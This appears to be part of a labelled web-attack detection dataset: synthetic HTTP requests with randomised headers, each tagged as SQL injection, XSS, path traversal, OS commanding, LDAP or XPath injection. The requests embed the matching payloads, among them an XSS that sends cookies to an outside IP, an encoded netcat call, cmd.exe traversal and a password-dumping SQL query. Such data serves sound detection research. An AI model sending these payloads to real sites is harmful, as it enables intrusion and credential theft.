PUT /ei9n2k3pecthCituepoi/tWzmCUt2D4v/dnjdTcK2hlYt9Z/ntdTaaerojc/OWvM6jLuni4Xoh/9.9BicDJuF51q3/i1ssurbFe.mdb? HTTP/1.0
Content-Length: 107
Content-Language: chtfe,uuars
Content-Encoding: identity
Content-Location: http://www.ttvoed.cz/6toheh/Aotla/aCrduoe/gsd4witm/etonsp.php
Content-MD5: aW95aWVvcnJIc2VlZXp6MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Aug 07 23:00:39 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: 86.255.24.148
Connection: keep-alive
Accept: text/*, audio/*, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: aU-9hLey, m3q9na-e;q=0.4, es-n, r2fh9e7o-e5o2bos
Cache-Control: no-cache
Client-ip: 115.61.183.184
Cookie: s9leNiph=ih:oA;es1=aletTrTaoa;moROobrnuhtir=9537
Cookie2: $Version="13"
Date: Thu, 08 Sep 05 01:52:06 GMT
ETag: "dzp3joQvsU@HpXG-X"
Expect: 100-continue
From: tTQl@hy8nl.be
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-Match: "fPtIf57Fs53.WE3fbMJ"
If-None-Match: "5SdyTB56Xusv-C.fULwo"
Max-Forwards: 75
MIME-Version: 4.2
Pragma: no-cache
Authorization: axprti ghkn=ytqfaA
Referer: /oli5ae/tjsSodg1.php4
TE: trailers,deflate,trailers
User-Agent: Mozilla/8.0 (X11; U; Linux i386 3.9; Ua-Lt; rv:1.5.4) Gecko/84506205
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: s9qavf/3.0 231.238.89.235:446
Transfer-Encoding: nker
Upgrade: 0al/6.6, EsAsw/7.5
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7

rtVfzriseci=<!-- #include    virtual="d:\windows\autoexec.bat"   -->&ka68Q4=tU.aK8y8Z-I

End - Id: 40399
Start - Id: 45781
class: PathTransversal
GET /ettnnezouwgnoairwjt/ln3TrmejsoNem6ede0r/RsQ8netcatoptBiframeDhXN/eUuXooYhmL2/tkeaeSilib/6ItmpId.Sdp/enosm5ehcs/4LxY1.aspx?31e0e4o21rictra=shnr3&0etmomnri=Elugpassthru1ehttptrsnneme&Dobhcrgspycnwf=uinputoptI+betweenafi%25zwinntvi+lxoi&9Ideemwssm=61929080&9d=httpnuy&e7Oi7mhcl3=so%40emHee7%2FeeeXf%3A%3D&beutlBsiejWoxe=33iwwzsR&Fnph-hKy6-I=3345520&teootrd1e=N&rugdwwoed=kgaT&YHSMGR_25=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&elsz=imdro HTTP/1.0
Host: 246.4.85.182
Connection: close
Accept: video/mpeg;q=0.6, audio/x-wav, text/*;q=0.5
Accept-Charset: us-ascii;q=0.4, iso-8859-8;q=0.3, euc-jp
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="65"
Date: Sun, 16 Dec 07 24:44:18 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: fli7=ifppb
From: a3y5m@itfi.st
If-Modified-Since: Sat, 02 Jun 07 18:47:52 GMT
If-Unmodified-Since: Sun, 03 Jul 05 20:05:06 UTC
If-Match: "Y-T2rMnRieNYjLlARv"
If-None-Match: *
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 6
MIME-Version: 1.4
Pragma: easherur='y0e7doe'
Proxy-Authorization: Digest realm
Authorization: oexndP er7lw7e=8laieuG
Range: -75,2802-6
Referer: /sea6F.msf
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Windows; U; WinNT 0.9; 1m-es; rv:0.7.3) Gecko/32740685
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9422x259
Via: FTP/5.4 www.huc5brCt.css, 3.5 89.148.40.17
Transfer-Encoding: identity
Upgrade: uit4/0.5, toct/8.1, blgp/4.0
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45781
Start - Id: 43205
class: OsCommanding
GET /fIRpHj/7RiG7W/nNii/0E4s/oipot2.jsp?eyai=1930338675&tErR=99&VHLbB=st3&saUd=LcctseeHipqhg&co=%250a+++++nc++++www.tosilatite.com++80%3B&dhcTa=4969542&3zzlTotcyoyeo=ErpnunRppz5adiO&2t1uEo=eisflink&lsd=963639295&AadDpgtwheia=%26n&UE@BJ02KmcRr=tBbU86&jEdiaplheus2ns=1104910255&ee=2421275761&evalvSinputAULsv=8474 HTTP/1.0
Host: www.irKq.biz
Connection: o8co
Accept: text/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.1, compress;q=0.7, identity, compress, deflate;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="350"
Date: Mon, 02 Aug 04 21:37:30 UTC
ETag: "XR31.2u_UhvXSfees"
Expect: 100-continue
From: eena@eaooz.de
If-Modified-Since: Wed, 19 May 04 13:52:13 UTC
If-Unmodified-Since: Sun, 06 Jan 08 03:50:28 CET
If-Match: *
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 8552
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: http://aezhwo.ch/ndNoy/4hsotl/ntle1e/dlvo/ha2hLe5.asmx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: nnroiimu/0.1.1.7
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 953x846
Via: ndoou/9.3 www.iimkiue.jpeg, FTP/1.5 120.156.58.190, FTP/6.7 156.61.209.95
Transfer-Encoding: ncrazu; eia7=j9fe9
Upgrade: hi11/1.2
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43205
Start - Id: 38818
class: LdapInjection
GET /iU4trdebnSmnex/rftst/sGsmOM4@p0I/srleKa/A-r/Alhisais/oj6lmait8yr/6SE/5ninsao5tum/rHHX@/ok2elungresAreeo.shtml?vxtgteegldats3o=i28rspteth&tt9=c6s4p7h&connectrWn5htacces_gY=Iaedrop&W3W1cLCzwindow.openhomeMM=t1opisetSrqttllut&eeNoegauud=%3Ctwin&qe3zT9aur0iue=e_qEEUt&ipeN1ioahuaiodm=%25hfy+rN%28%28ax%3B%7C0toNari&nq=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 122.159.202.180
Connection: close
Accept: */*
Accept-Charset: euc-cn, iso-8859-5, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: o-5tlHhir;q=0.4, ce-ituh;q=0.1
Cache-Control: max-stale=19556
Client-ip: 166.96.232.49
Cookie: ouaeh=700;Evdeh=ew
Cookie2: $Version="4"
Date: Sat, 25 Jun 05 06:36:48 CET
ETag: W/"x7ZM0hHOj6lnM5eu"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Fri, 21 Dec 07 14:56:18 GMT
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: ".WmLAjIX6y.c4kgKWj.M"
If-None-Match: "6yIrmTw1gqsS98sQA"
If-Range: Sat, 29 Aug 09 09:02:04 UTC
Max-Forwards: 536
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: hu4T srrtxd=natff
Range: 635-4999,578-28594,-3
Referer: /sssZla/eIseoamo/f1tft8dd/nHon/nMmq.dll
TE: trailers,trailers
Trailer: Accept
User-Agent: v4hiq (lMwFU6B0N3; eFwQERz)
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 4.7 www.eaeuoi3g.htm, HTTP/7.4 164.138.4.82, 3.5 www.te6tc.shtml
Transfer-Encoding: tPiVt; ueAtt=isolelc
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38818
Start - Id: 48338
class: XPathInjection
GET /xj9JpmeuIUp/aMrhr70it8/ETf7Tp9QSSa/ItrraRhaaYuhsedh/m70kcR/wnllultiwfe3upOyr/ecirsl/eE9J7L/4a/uei2mvc1ntoitoreZ.asmx?9Qr.v=3&edi7cyarlheg=at%7EcynLetcuto&srao02duotr=iuao8tn&ac=eKb&vKFqj=fAW943&beiA1iihhl6=R7ef&u1heumWe=rme%27lsl9ensqga%3Aml+i%28&7bstT=937 HTTP/1.0
Host: www.od4nehseou.de:80
Connection: hlhtrai
Accept: text/xml, application/postscript;q=0.2, text/xml
Accept-Charset: iso-8859-8-i, iso-8859-9, cp-932;q=0.8, windows-1254;q=0.2
Accept-Encoding: 7hs3Kd' or (i     <   count(aa/child::text())     and  j <    count(oasSas/child::comment()) and  k   < count(oa/child::*) )    or 'ne1h0'   = '  EqeOAi'    or
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.211.226.108
Cookie: ieoaRstwDai=eunion g @;httpQ8t5Kprocessing-instructionOscriptQ=eus;e9mF=oqenocaIn7oincludeh1 psystem/e;eaensimcseesg=aAv
Cookie2: $Version="50"
Date: Thu, 13 Oct 05 22:40:29 UTC
ETag: W/"imjZvWN0w46MgICT"
Expect: 100-continue
From: eubmr8po@lWep.cz
If-Modified-Since: Mon, 09 Jan 06 10:32:56 CET
If-Unmodified-Since: Thu, 30 Jun 05 13:35:54 UTC
If-Match: *
If-None-Match: "gLAXQmijNbpR3aS"
If-Range: *
Max-Forwards: 812
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic QXRkbXJhbjU6bnRvdA==
Authorization: amois 8RrOiykl=stajd
Range: 1201-6,062085-441
Referer: /sezwtn/Heoiha.mpeg
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: iux3P9M http://www.afis.gov
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 433x249
Via: 8.2 78.231.196.103:73722, rbdn/4.6 www.iditn6L.tiff
Transfer-Encoding: deflate
Upgrade: nhogo/6.4
Warning: 936 www.ew9sLHSe.html "otReepcbaeheiessidy" "Tue, 04 May 10 22:09:47 UTC"
X-Forwarded-For: 162.179.117.235
X-Serial-Number: 6875195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 48338
Start - Id: 48134
class: XSS
GET /nmycsCSR_qOW6M1L@B/o3imgjwTI3l7Kr@.sh?uri=%3Cform%2Bname%3Daio%3E%3Cselect%2Bname%3Dlndr+%3Ehttp%3A%2F%2Fwww.6h.com%2Fes%2F%3F%3C%2Fselect++++%3E%3C%2Fform++%3E&waiay2htrr=5R3&had=33633&SO8obO=padx HTTP/1.0
Host: 224.87.230.104
Connection: nenSo
Accept: */*;q=0.6
Accept-Charset: koi8, iso-8859-7;q=0.2, iso-8859-4;q=0.3, cp-936, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: tlSpa70e-ziar, trElhnm-E, hxpiss-eesttfaa
Cache-Control: max-stale=1
Client-ip: 250.253.78.18
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="346"
Date: Mon, 21 Dec 09 17:06:55 CET
ETag: "l@x1xFwhpLcpguO"
Expect: 100-continue
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Dec 07 20:32:24 UTC
Max-Forwards: 7
MIME-Version: 8.0
Pragma: ew=CstO
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 839-854295,-2024
Referer: http://www.Himrr.de/tenE.jpg
TE: deflate,gzip,trailers
Trailer: Accept
User-Agent: Mozilla/2.1 (Windows; U; WinNT 2.0; vs-dd; rv:5.1.7) Gecko/86747191
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/3.2 www.ohdudahd.jpg
Transfer-Encoding: deflate
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 452 www.beld.html "tgngho80ui" "Tue, 29 Jun 04 10:36:42 GMT"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48134
Start - Id: 48759
class: XPathInjection
GET /mf1wvF0XPX1DIHOO8Dn_/sjN.jsp?enUwi9ii9=5324&gs5geiveuiheu=inUoawoeeeab%3FservicesZ%3F&3pCv4Lpgeb=ar&anaEUeeIls=nO5+i&rcpMWKZ=aeeh&hepbdmeeboIa=095769&PUTtZ=aaC.H0a2&hbeyl8eeCq=fqaot%27%5D++++%7C++P++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28+%29++%3D%274loh&eof4h=nAp+eidrI%7Ebal HTTP/1.1
Host: www.otgl3kp.st
Connection: dudu
Accept: video/mpeg;q=0.7, audio/*
Accept-Charset: hz-gb-2312;q=0.0, x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=62355
Client-ip: 29.90.247.5
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Thu, 22 Oct 09 08:10:32 CET
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sat, 25 Jun 05 24:33:31 CET
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: *
Max-Forwards: 3800
MIME-Version: 2.5
Pragma: eaar=e
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -26
Referer: /ituY/ytbd/ftnicqov/diwei.cgi
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (Windows; U; Win98 0.9; en-ot; rv:7.0.4) Gecko/64251892
UA-CPU: MIPS
UA-Disp: 5387,1102,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: hDzyep/5.5 189.152.160.71:57
Transfer-Encoding: deflate
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 532 201.121.16.113:0328 "sow6hi3ltE" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48759
Start - Id: 44383
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 165.113.157.101
Connection: 9ui8Aiky
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: e-itnte, 1flnee-iod
Cache-Control: o='tihhuId'
Client-ip: 25.151.126.170
Cookie: n1rilgdleu9enf=aa;EunionS.4bZkRg8=f unionOa6 pAstnen;dAtjo=t3NCJ.bp;rteimw=rar;lgTciliye=0335;botooedsr=a
Cookie2: $Version="962"
Date: Mon, 08 May 06 04:56:06 UTC
ETag: "Zxg0X5Bk2DYQUJxr"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: "dcNs23J-dHPSJRW9"
If-Range: Sat, 24 Jun 06 20:55:00 GMT
Max-Forwards: 3100
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest nc=E88c7DfF
Range: -592489
Referer: http://www.i3sef.de/skfihl.png
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: ned8wzoool (xMrbCSnqS; eJ@QPJ8x0; sRJDBnhoX)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: 2.5 149.98.207.116:1561, HTTP/6.9 150.154.217.84:04
Transfer-Encoding: deflate
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44383
Start - Id: 35559
class: XPathInjection
PUT /jecmd/tyt7gNk/qKtNNdpIUS@/hSuYM/FgbvarhttpchildI0lreplace/aca/PwgetNPRAnode6netcatZhtaccesyhomefJ/st7s2endEnrsiavtorm/f0vfX0S.HEDkMpMmF/kNwcx8xV22pEGn.mspx? HTTP/1.1
Content-Length: 140
Content-Language: Okn5rich,s2ee,rPrr3r
Content-Encoding: identity
Content-Location: http://www.iJ7nrc.st/vseisr.htm
Content-MD5: bHNhdHFlc2V0c3Rid3BzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 13:25:17 UTC
Last-Modified: Fri, 02 May 08 15:38:23 GMT
Host: 76.157.164.213
Connection: keep-alive
Accept: text/*;q=0.0, image/gif;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress, gzip;q=0.1, compress, identity
Accept-Language: nlooe-een;q=0.3, frmnany-4id;q=0.4
Cache-Control: 4imeUee='xrtsva'
Client-ip: 51.72.214.226
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="8"
Date: Sat, 24 Mar 07 23:47:10 GMT
ETag: "v_dCT6QcvMRM03vgD95"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 22 Aug 08 23:30:39 UTC
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 67
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: -1,-1839
Referer: /itsotpn0.msf
TE: deflate;q=0.5,trailers,trailers
Trailer: Via
User-Agent: aeee0ts
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 174x8533
Via: FTP/5.3 188.205.80.194, 8pd51/6.2 199.141.156.90, HTTP/4.6 www.tev3yea.jpg:9
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 491 www.obverec.js "eapntohnl" "Thu, 19 May 05 14:19:45 GMT"
X-Forwarded-For: 110.77.12.7
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tPSun5C6=652101&XK2Y=o%2Ftm%2Fjhu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D907%5D+++++or+%27lo%27++%3D++%27&xHgEsock_stream9E6g%uc=0465054

End - Id: 35559
Start - Id: 38955
class: LdapInjection
GET /u3or/oO097kiee/FWu84.jpeg?wUiTaktleokposs=ans%7Elog%5C+leoot%7Es&serhb6dd3a=665&SiZuTnZ_BB=32&nJnq=3%25ide&etrfaneHoLp33en=vdocumentw+pnt&cqjdJhahwaOdwen=%29+%28%7C+%28displayName%3Dhad*%29+%28name+++%3D+++had*++++%29%28++++mail%3Dhad*++++%29&ntutlzzratwbi=ihbb%24At HTTP/1.0
Host: www.oetcmacuti.biz:97329
Connection: close
Accept: text/*;q=0.0, text/*;q=0.0
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="965"
Date: Mon, 13 Sep 04 11:24:31 CET
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Sat, 01 Jan 05 23:02:48 GMT
If-Match: "DifEtziAnd3riXs0E"
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: Mon, 18 Aug 08 20:38:36 GMT
Max-Forwards: 6
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: NTLM cWhtYUl5c2Vkc2kxc3hlNkVkNXhBb2VTYWlodDJldGR6YkVldGJqeWU5Z2V1YmJh
Range: 678-706492,70758-,6439-
Referer: /mee9m/feem.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 1.7; it-hi; rv:7.6.8) Gecko/19860777
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38955
Start - Id: 42373
class: SqlInjection
GET /s1jeirnoa4lateawna/neh1To/on/g92edlUCgr/d66K.msf?yn7eoaxaTn1i=%27%3B++++begin+++declare++++%40ret+varchar%288000%29+++++set+%40ret%3D%27%3A%27+++++select+++++%40ret%3D%40ret%2B%27++++%27%2BicfludGi%2B%27%2F%27%2Bpassword+from+pt++where++++aeo3E%3E%40ret+select+%40ret++as+++++ret++into+++foo+++++end-- HTTP/1.0
Host: 134.147.201.100
Connection: rjeRo9k
Accept: text/html, image/*;q=0.7, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: zdteu2n-CtntyHa;q=0.3
Cache-Control: max-age=2783
Client-ip: 23.45.21.183
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="6"
Date: Sat, 27 Sep 08 19:54:15 UTC
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: eudloA@r7hlle0nht.it
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Wed, 01 Aug 07 08:33:17 UTC
If-Match: "Io2f5Mr4Y3OTmUcqp"
If-None-Match: *
If-Range: Thu, 26 Jun 08 03:53:58 GMT
Max-Forwards: 63
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Basic eWVpZGFiOmxkbDdo
Range: -966,396-333,-3990
Referer: /y9drw/entgeNd/ayUr/axr7E1/madic.php4
TE: chunked,gzip,trailers
Trailer: Range
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 8.9; gp-Tw; rv:0.8.7) Gecko/54963432
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1475x116
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: identity
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 602 155.202.241.106 "ahmhtsCsahetnnil" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42373
Start - Id: 48095
class: XSS
GET /inputvtL/a.sT8xLlm/ltbsl3e/M4elalo1s4eocctgpote/icQgsZ@yD/43WFREB_u@.Kip9/s4actdarans/r4184mqdoH8VCo6T/hdtdortenlonhgpik.jpg?hrheAa9Eget=676772&e8amavetqhr=aiv+aenwIGoi&EoE0bav=%3C%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F254.161.11.103%2Fve.jsp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E HTTP/1.0
Host: www.Ijeuaa.biz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-874;q=0.8, cp-932;q=0.9, iso-8859-4;q=0.4, x-mac-hebrew;q=0.0, iso-8859-4;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: coaamo-WlIX;q=0.4, aocnAeii-aluthTd;q=0.2, ia4a-neeheuw, useg-ir;q=0.1, epee-y6e;q=0.9
Cache-Control: r1t8e=cyd
Client-ip: 128.96.14.177
Cookie: ejuab8p=86;T_VZgS4=640596038;e7nbnfmjo=Lanntw3ehPgoticf;anHe9NhI0as=tmpaai
Cookie2: $Version="484"
Date: Wed, 24 Jun 09 22:55:11 GMT
ETag: "_kZg_@Z9twta657-o@Y"
Expect: 0oBnuh=bntvena
From: etsoAo6b@Dfeyr.ch
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: "GcE-g2tQMoCO8S4zzc4N"
If-Range: Mon, 15 Mar 10 24:20:14 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: ijdeiT kiao=mtjnUr
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: http://www.crgram.st/oixl.asp
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/8.3 (X11; U; Solaris 1.3; o8-hd; rv:2.1.7) Gecko/61494058
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: identity
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 628 213.163.87.234 "snanhhatel" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48095
Start - Id: 46247
class: PathTransversal
GET /roNX8/hDd-Athl-Wg/tN.pqGQvL/dsXup4to.jpg?pRaeegr=ip&ooaiE0re3r=i%3A%2F.htaccess%7E&cuewoatctsodsoi=ibpmCQkVdF HTTP/1.1
Host: www.oaahseqdam.net
Connection: close
Accept: text/xml;q=0.8
Accept-Charset: windows-1255, x-mac-arabic, iso-8859-15, euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 231.150.7.86
Cookie: 0eHbnE7o6=olphpreieimg
Cookie2: $Version="79"
Date: Wed, 04 Apr 07 18:18:13 CET
ETag: "N7Ppg6kTnN1vCFx0Lc"
Expect: 100-continue
From: e4ia@iiZbne.de
If-Modified-Since: Sat, 24 Sep 05 23:41:37 CET
If-Unmodified-Since: Wed, 07 Jan 09 21:47:35 CET
If-Match: "Zuy8K9dKF00iPR4LTkY"
If-None-Match: *
If-Range: "QpC6NCb43Hnxt7j3"
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Digest response="26B00B3BF99F6f41CaF237Baa34fD98D"
Range: 5263-
Referer: /ytad/shieh/Sasaa/uakot6.pl
TE: deflate;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (X11; U; Linux i386 1.9; rh-lw; rv:0.8.2) Gecko/91565336
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0134x6320
Via: 9.9 145.233.125.168:67645, HTTP/1.1 www.dxooe7d.html, FTP/5.1 95.190.117.1
Transfer-Encoding: deflate
Upgrade: tk5t/9.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46247
Start - Id: 41014
class: SqlInjection
